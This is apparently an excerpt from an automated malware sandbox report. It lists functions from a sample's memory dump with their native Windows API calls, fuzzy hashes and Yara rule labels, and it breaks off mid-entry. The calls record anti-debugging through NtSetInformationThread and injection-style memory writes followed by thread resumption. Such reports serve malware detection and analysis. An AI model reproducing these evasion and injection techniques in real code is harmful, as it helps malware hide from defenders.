                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T$+f
                                  • API String ID: 543350213-2688641672
                                  • Opcode ID: 57b8d59a7b4ddb5b913d0bfa56dbaccbd5da1f00c2a2b9cc97897ca4f185c8d9
                                  • Instruction ID: a8fced34fbee1794454502137fcf5833e9f510326e5f06ed03e4398dae0fd2d8
                                  • Opcode Fuzzy Hash: 57b8d59a7b4ddb5b913d0bfa56dbaccbd5da1f00c2a2b9cc97897ca4f185c8d9
                                  • Instruction Fuzzy Hash: B5024871760306DFEB149EB8CDA0BEA73A6FF44740F544329EC9693289D774A885CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D86B3, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                    • Part of subcall function 022D8E42: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022D8852,00000040,022D090E,00000000,00000000,00000000,00000000,?,00000000,00000000,3E17ADE6), ref: 022D8E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                  • String ID: 1.!T$+f
                                  • API String ID: 449006233-2688641672
                                  • Opcode ID: f645fa083f14c25e91e73a318b0079bf0ed6b9859651fb1b7d07a00c52b0f023
                                  • Instruction ID: 772177aa84490f30c249d28c3e096811e5f9962c29ad3b9cf861511b7b869df9
                                  • Opcode Fuzzy Hash: f645fa083f14c25e91e73a318b0079bf0ed6b9859651fb1b7d07a00c52b0f023
                                  • Instruction Fuzzy Hash: B1C10670A64342DEEF249EB489D47A6B791AF16360F44825ADD968B2DEC374C483C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D082B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T$+f
                                  • API String ID: 543350213-2688641672
                                  • Opcode ID: 7986c53a78f6977a7d57081c1a2a2e76a3c2be1ecc7e288234ed08bddf50f4c6
                                  • Instruction ID: b40265bff699bb7d8bae1005dd9c8db59c0206ab77762078990d50f5d8259bf5
                                  • Opcode Fuzzy Hash: 7986c53a78f6977a7d57081c1a2a2e76a3c2be1ecc7e288234ed08bddf50f4c6
                                  • Instruction Fuzzy Hash: C0219D742B030AAAFF206EE08DB1BEF27969F44784F804105FD466B2D8D7A4C945C953
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D085F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T$+f
                                  • API String ID: 543350213-2688641672
                                  • Opcode ID: de1a8b9712650ce38419062723f324ef54f6b65945cf6301fe80249df7fdcad6
                                  • Instruction ID: db77c1bd2cd6bb959bc8b9f887cb0d741fbb82cc0d7aca645cebe0b9e5180b63
                                  • Opcode Fuzzy Hash: de1a8b9712650ce38419062723f324ef54f6b65945cf6301fe80249df7fdcad6
                                  • Instruction Fuzzy Hash: AB216A742B430AAAFF206EE08DB1BEB27969F44784F804105FE466B2D8DBA4D945C952
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D80E3, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 508COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: xG$%
                                  • API String ID: 1029625771-1089927627
                                  • Opcode ID: ed892f02088468059af02c273cf06267670c30b779831366a9e3c7af25d09ee7
                                  • Instruction ID: fedd433c19e03c0b356a84a7f518d7d31186af70789a0d11f71bdc10b6a77637
                                  • Opcode Fuzzy Hash: ed892f02088468059af02c273cf06267670c30b779831366a9e3c7af25d09ee7
                                  • Instruction Fuzzy Hash: D7F18B75660306AEFF305AA8CD557E63362AF06394F940229ED42671C8E3F988C6CB47
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D2EC7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 4b7c59b372513c93f761f5164b4fc52282bbb54a7be372e6568fa3ebfc21a32f
                                  • Instruction ID: bcae09796a13814be28ea27f157b7a049b27e375bbd58ad9196d5e8f5bcba8fe
                                  • Opcode Fuzzy Hash: 4b7c59b372513c93f761f5164b4fc52282bbb54a7be372e6568fa3ebfc21a32f
                                  • Instruction Fuzzy Hash: 06510470274302EFEB246AE4DCA9BF96266AF04355F91465AEC828A0DDD7F4C4C5CA13
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D08BB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: fecfa85cff2e054fb246ae0aed0ca8136674cb405d4059a2292824e5d5ffeb5f
                                  • Instruction ID: 7d73aa231d53b58a98741b9013a7d310a15a657faff37d54e10e92757ca63f40
                                  • Opcode Fuzzy Hash: fecfa85cff2e054fb246ae0aed0ca8136674cb405d4059a2292824e5d5ffeb5f
                                  • Instruction Fuzzy Hash: 57119B702B430AA6FF202EE08D61BEF27659F08BC4F800205FE466B2D8D7A0DD41C993
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D08FB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: f74a28123101b2cd306af9243a01b5a8d939ab14b94293aa1b89ce9f6028f307
                                  • Instruction ID: 2a8c1a30f4bb186a7dd4ddc6da59150998f1c2c40f5babe47aa859e8aad342c1
                                  • Opcode Fuzzy Hash: f74a28123101b2cd306af9243a01b5a8d939ab14b94293aa1b89ce9f6028f307
                                  • Instruction Fuzzy Hash: 7911C07427430666FF202EE48D60BEF27655F04BD4F800105FD466B2DCCBA4D941C893
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D365C, Relevance: 1.9, APIs: 1, Instructions: 387nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadMemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3569954152-0
                                  • Opcode ID: d2bf08d5484142659cfab2cf31119674df3079031aca2defae23c024e82856e7
                                  • Instruction ID: 56c3dc766df66ddc0464875a61170169a1600fa0fd331bdb9dd5dfd896fedaf0
                                  • Opcode Fuzzy Hash: d2bf08d5484142659cfab2cf31119674df3079031aca2defae23c024e82856e7
                                  • Instruction Fuzzy Hash: B5C148B566030AAEFF205EA4CD56BE53723AF01794F904225FD856B1C8D7B588C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D36D3, Relevance: 1.8, APIs: 1, Instructions: 338nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadMemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3569954152-0
                                  • Opcode ID: 394c9f8f34c229f44ad0c785e89003c9faa7b92439322668f2646ed8993a240b
                                  • Instruction ID: bec28f0c5c1327f30fbf32bdb77e6527234e49a315c44f410f3e1595981a1021
                                  • Opcode Fuzzy Hash: 394c9f8f34c229f44ad0c785e89003c9faa7b92439322668f2646ed8993a240b
                                  • Instruction Fuzzy Hash: A8B16AB566030AAEFF205EA4CD55BE53723AF01394F944225ED82A71C8D7B988C6CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3754, Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b97f8365c6f4ce19774a1a6067683c7196cb72c123d309f23d41a9076115f1c
                                  • Instruction ID: c61b7e3ad409af6340521c743ec0a1efa1226f12b22cb15bd73929999f5c1dd6
                                  • Opcode Fuzzy Hash: 7b97f8365c6f4ce19774a1a6067683c7196cb72c123d309f23d41a9076115f1c
                                  • Instruction Fuzzy Hash: EFA139B426030AAEEF205EA4CD557D53723AF15394F944129ED42A71C9E7B988C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D37B8, Relevance: 1.8, APIs: 1, Instructions: 294nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadMemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3569954152-0
                                  • Opcode ID: 8ad58a584f5d9cd2b5c295c6aba558ed42d8d5975adf05f54da4ffb603e9358e
                                  • Instruction ID: 433e4c0e9f648e93e354c921d5d1c16165e63903f7f0e8c88f71917179979a0f
                                  • Opcode Fuzzy Hash: 8ad58a584f5d9cd2b5c295c6aba558ed42d8d5975adf05f54da4ffb603e9358e
                                  • Instruction Fuzzy Hash: 69914DB426030AAEFF205EA4CD567D53722AF053D4F944125ED82A71C9D7F988C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3812, Relevance: 1.8, APIs: 1, Instructions: 279nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadMemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3569954152-0
                                  • Opcode ID: d02507ee6092c8e0e4365fee077dd79ac51005be0487b96ace15fb6a59dc375b
                                  • Instruction ID: 33e8df09b97ceaef47ab6ae21818017dea21c59be97789a1e089fe738daf0888
                                  • Opcode Fuzzy Hash: d02507ee6092c8e0e4365fee077dd79ac51005be0487b96ace15fb6a59dc375b
                                  • Instruction Fuzzy Hash: 67913CB426030AAEFF205EA4CD567D57722AF053D4F444129ED85AB1C9E7F948C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3873, Relevance: 1.8, APIs: 1, Instructions: 265nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 5ae96e4947eb15e78bff23e8dd472b4b59a56cc31d95ce149f9dacc8f4742abf
                                  • Instruction ID: b95250018cc4c270ad013e803d6a3200ee1437ab67ff22480bb52005d6a2a3c5
                                  • Opcode Fuzzy Hash: 5ae96e4947eb15e78bff23e8dd472b4b59a56cc31d95ce149f9dacc8f4742abf
                                  • Instruction Fuzzy Hash: 938139B426030AAEFF205EA4CD567E53762AF05384F444129ED81AB1C8E7F988C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D38B3, Relevance: 1.8, APIs: 1, Instructions: 255nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 56517377adf8a06efd371f351ade3920b8f2ffcb2e420f4eff8fb2ef94505227
                                  • Instruction ID: deb43a6f4a767e319ef5184bd557f8b65756f4aa48b464d0271b77906d6f9b49
                                  • Opcode Fuzzy Hash: 56517377adf8a06efd371f351ade3920b8f2ffcb2e420f4eff8fb2ef94505227
                                  • Instruction Fuzzy Hash: 79812AB526030AAEFF205EA4CD56BE53722AF057C4F844129ED85A71C8E7F994C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3914, Relevance: 1.7, APIs: 1, Instructions: 239nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 1aa569ec896bb15b6046d6d41b97249750ea42e70c06d890a2f2a55e628646d8
                                  • Instruction ID: b14f932e5322fcb40acd42a433650e40538da25e8cf1927d3ebca4cce309a885
                                  • Opcode Fuzzy Hash: 1aa569ec896bb15b6046d6d41b97249750ea42e70c06d890a2f2a55e628646d8
                                  • Instruction Fuzzy Hash: B8712AB426030AAEFF205EA4CD567E53722EF05794F444125FD86AA1C8E7F998C2CF46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3978, Relevance: 1.7, APIs: 1, Instructions: 224nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 12f40e15e832f3e3059bf36c409c22612568342fd666c4a3ab711fdd02b95514
                                  • Instruction ID: 10cc4fa273060b54bc629cd671b5ea4ae392b37506cc35c6fd5fd010b5a30a31
                                  • Opcode Fuzzy Hash: 12f40e15e832f3e3059bf36c409c22612568342fd666c4a3ab711fdd02b95514
                                  • Instruction Fuzzy Hash: C07139B426030AAEFF305EA4CD56BE53722AF15394F444125FD85AA1C8D7F998C2CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3A90, Relevance: 1.7, APIs: 1, Instructions: 180nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 9a58fc5f2bb38a7986c0b72e4befb103ed960752ba4de209818e919bd4b51036
                                  • Instruction ID: 3bfb2f7bb289dcc8b9c28a4d5c0585116fd424acd6a0526b9c93516e79e628cd
                                  • Opcode Fuzzy Hash: 9a58fc5f2bb38a7986c0b72e4befb103ed960752ba4de209818e919bd4b51036
                                  • Instruction Fuzzy Hash: C351487426030AAEFF319EA4CD96BE53712AF15394F444165FE82AA1C8D7F588C2CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3ADF, Relevance: 1.7, APIs: 1, Instructions: 169nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: f4aff385adc0e8630d883b1ef4ecbe961dd0ecc80ccadf4f08926242dc59edf5
                                  • Instruction ID: cded1b74c0810038c142818bb6d6d673a44a70c41a32e586957b0f463a12e86f
                                  • Opcode Fuzzy Hash: f4aff385adc0e8630d883b1ef4ecbe961dd0ecc80ccadf4f08926242dc59edf5
                                  • Instruction Fuzzy Hash: 8951497426030AAEFF215EA4CD957E53716EF14394F444165FE81AA1C8D7F588C2CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3B4C, Relevance: 1.7, APIs: 1, Instructions: 152nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 0a4941108fb73421a35a7b79175e0b416e0419211e57d38c0c948d05dc8f3035
                                  • Instruction ID: b37ffcd91a0d4ef1c71bf8280149d510e14e43588f654a145a1c96141803e3b1
                                  • Opcode Fuzzy Hash: 0a4941108fb73421a35a7b79175e0b416e0419211e57d38c0c948d05dc8f3035
                                  • Instruction Fuzzy Hash: EB4134B426030AAEFF219EA4DD95BE93712EF04394F444169FE81AA1C8D7F588C1CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D9440, Relevance: 1.6, APIs: 1, Instructions: 150nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 525e1e2787240e33ec2ee6afa01d7736f433f512477b25cd92740be7e17ed382
                                  • Instruction ID: fb2793f4f3cd6232467abced75a8f18312779eb884ea729507992be05be8c0ea
                                  • Opcode Fuzzy Hash: 525e1e2787240e33ec2ee6afa01d7736f433f512477b25cd92740be7e17ed382
                                  • Instruction Fuzzy Hash: 9741E832739202CEEB256DE4C5A43F523A2AB15364F954266FC47871DCC7E948C0C782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D9473, Relevance: 1.6, APIs: 1, Instructions: 132nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 0afd80e6c163db1f2175563cbb597e02b5bf837d330c663575d50d5ef36d0d0d
                                  • Instruction ID: 6ff093474198cd0acd603ebde677b8d16a3cff5b8013552536f36be8668fb76b
                                  • Opcode Fuzzy Hash: 0afd80e6c163db1f2175563cbb597e02b5bf837d330c663575d50d5ef36d0d0d
                                  • Instruction Fuzzy Hash: AB41E532739242CEEF346DD4C5A43F52362AB16364F99426AF847871ECC7E988C0C782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D94D7, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e8b15e7570d4c83b40dcc9df632ac5b3b2dd7d952ff96fa01825ff8e4f183b0
                                  • Instruction ID: dbaf107e874a03154661184de6c073ceae2a79b50cb412b1f16df42aca90521a
                                  • Opcode Fuzzy Hash: 7e8b15e7570d4c83b40dcc9df632ac5b3b2dd7d952ff96fa01825ff8e4f183b0
                                  • Instruction Fuzzy Hash: 5641B332639242DEEF356DD4C4A47F523A2AB16364F995566F847870ACC7E988C0CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D9567, Relevance: 1.6, APIs: 1, Instructions: 113nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 2b6ec6f60bd2dcf0fc3208264b4274ba924cb1bd885bd46190bdb485793ea14a
                                  • Instruction ID: 317e1b95a9d828481a8f66fc5bede1b6f119e69a17f5d031484d8ab2d3c12212
                                  • Opcode Fuzzy Hash: 2b6ec6f60bd2dcf0fc3208264b4274ba924cb1bd885bd46190bdb485793ea14a
                                  • Instruction Fuzzy Hash: 9831A232639242DEEF346ED4C4A47F53362AB16364F994166F857971ECC7E988C0CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D9607, Relevance: 1.6, APIs: 1, Instructions: 101nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 7cb8dc03c11e3c9c023882ed55e400f22c804622891517c5231ed43a6424a86e
                                  • Instruction ID: 96eb08e47f87ba3c819e0b16ba050dabd062512bfc3aed3691614137d655dc58
                                  • Opcode Fuzzy Hash: 7cb8dc03c11e3c9c023882ed55e400f22c804622891517c5231ed43a6424a86e
                                  • Instruction Fuzzy Hash: 5431C032639242DEEF346ED484A47F53362AB16364F991156F8428B1ECC7F988C0CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D963B, Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 6015882ce7cae93a7d53e7107311867a8d70ded347116d5f3f2cf52dc1cc2d87
                                  • Instruction ID: b77c9b8f2f4070d511785ddddffafe430641c2469445be1dc1d36a7e642d9eab
                                  • Opcode Fuzzy Hash: 6015882ce7cae93a7d53e7107311867a8d70ded347116d5f3f2cf52dc1cc2d87
                                  • Instruction Fuzzy Hash: 7131C132639252DEEF356ED484A87F53362AB15364F991256F8438B1ECC7E948C0CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3C7F, Relevance: 1.6, APIs: 1, Instructions: 97nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 022D3D99
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: 18cc98a4249aec2df785b35ff0c010348e65007936894656ad9bf80f5a62dbdf
                                  • Instruction ID: 0d7fa0a5cea5460fdb24ae50923034927603fb1441ffa82a0edc5aaf7b3da474
                                  • Opcode Fuzzy Hash: 18cc98a4249aec2df785b35ff0c010348e65007936894656ad9bf80f5a62dbdf
                                  • Instruction Fuzzy Hash: C131E2B422030AAFEF259EA0CD94BE93762FF08354F584169FD8596188D7B598D1CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D96DB, Relevance: 1.6, APIs: 1, Instructions: 88nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 85a6b775cab72848b13082a1c7cbf686d3c89785c3d93f328ca91a54e8e70318
                                  • Instruction ID: 02bd7d840ad6ae10fbd8652e759f5f110dd71eea3708a6490af66aa25e651840
                                  • Opcode Fuzzy Hash: 85a6b775cab72848b13082a1c7cbf686d3c89785c3d93f328ca91a54e8e70318
                                  • Instruction Fuzzy Hash: 1121B033639253DEEF356ED484A87F43362AB16364F991156F8429B0ECC7F988C0C682
                                  Uniqueness

